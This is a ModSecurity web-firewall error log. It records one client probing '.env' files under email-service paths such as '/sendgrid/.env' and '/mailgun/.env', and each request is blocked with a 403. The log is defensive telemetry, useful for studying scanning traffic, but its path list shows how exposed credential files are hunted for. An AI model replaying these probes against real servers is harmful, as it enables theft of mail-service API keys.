[Mon May 11 18:07:32.005958 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailing/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSAAAAAo"]
[Mon May 11 18:07:32.006206 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailing/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSAAAAAo"]
[Mon May 11 18:07:32.144441 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xA-Qm4vhlWBPlMjeSAAAAAo"]
[Mon May 11 18:07:32.260859 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/notifications/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSQAAAAo"]
[Mon May 11 18:07:32.261112 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/notifications/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSQAAAAo"]
[Mon May 11 18:07:32.261535 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xA-Qm4vhlWBPlMjeSQAAAAo"]
[Mon May 11 18:07:32.676647 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/notify/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSwAAAAo"]
[Mon May 11 18:07:32.676951 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/notify/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeSwAAAAo"]
[Mon May 11 18:07:32.677301 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xA-Qm4vhlWBPlMjeSwAAAAo"]
[Mon May 11 18:07:32.959078 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sender/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeTQAAAAo"]
[Mon May 11 18:07:32.959329 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sender/.env"] [unique_id "agH-xA-Qm4vhlWBPlMjeTQAAAAo"]
[Mon May 11 18:07:32.959628 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xA-Qm4vhlWBPlMjeTQAAAAo"]
[Mon May 11 18:07:33.325890 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/campaign/.env"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTgAAAAo"]
[Mon May 11 18:07:33.326109 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/campaign/.env"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTgAAAAo"]
[Mon May 11 18:07:33.326410 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTgAAAAo"]
[Mon May 11 18:07:33.651890 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/newsletter/.env"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTwAAAAo"]
[Mon May 11 18:07:33.734353 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/newsletter/.env"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTwAAAAo"]
[Mon May 11 18:07:33.734751 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xQ-Qm4vhlWBPlMjeTwAAAAo"]
[Mon May 11 18:07:34.013175 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ses/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUQAAAAo"]
[Mon May 11 18:07:34.013418 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ses/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUQAAAAo"]
[Mon May 11 18:07:34.013723 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xg-Qm4vhlWBPlMjeUQAAAAo"]
[Mon May 11 18:07:34.425758 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sendgrid/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUgAAAAo"]
[Mon May 11 18:07:34.425994 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sendgrid/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUgAAAAo"]
[Mon May 11 18:07:34.426302 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xg-Qm4vhlWBPlMjeUgAAAAo"]
[Mon May 11 18:07:34.734702 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sparkpost/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUwAAAAo"]
[Mon May 11 18:07:34.735063 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sparkpost/.env"] [unique_id "agH-xg-Qm4vhlWBPlMjeUwAAAAo"]
[Mon May 11 18:07:34.735503 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xg-Qm4vhlWBPlMjeUwAAAAo"]
[Mon May 11 18:07:35.018614 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/postmark/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVAAAAAo"]
[Mon May 11 18:07:35.018852 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/postmark/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVAAAAAo"]
[Mon May 11 18:07:35.019136 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xw-Qm4vhlWBPlMjeVAAAAAo"]
[Mon May 11 18:07:35.300125 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailgun/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVQAAAAo"]
[Mon May 11 18:07:35.300366 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailgun/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVQAAAAo"]
[Mon May 11 18:07:35.300664 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xw-Qm4vhlWBPlMjeVQAAAAo"]
[Mon May 11 18:07:35.555280 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mandrill/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVwAAAAo"]
[Mon May 11 18:07:35.555552 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mandrill/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeVwAAAAo"]
[Mon May 11 18:07:35.555912 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xw-Qm4vhlWBPlMjeVwAAAAo"]
[Mon May 11 18:07:35.926397 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailjet/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeWAAAAAo"]
[Mon May 11 18:07:35.926655 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailjet/.env"] [unique_id "agH-xw-Qm4vhlWBPlMjeWAAAAAo"]
[Mon May 11 18:07:35.926983 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-xw-Qm4vhlWBPlMjeWAAAAAo"]
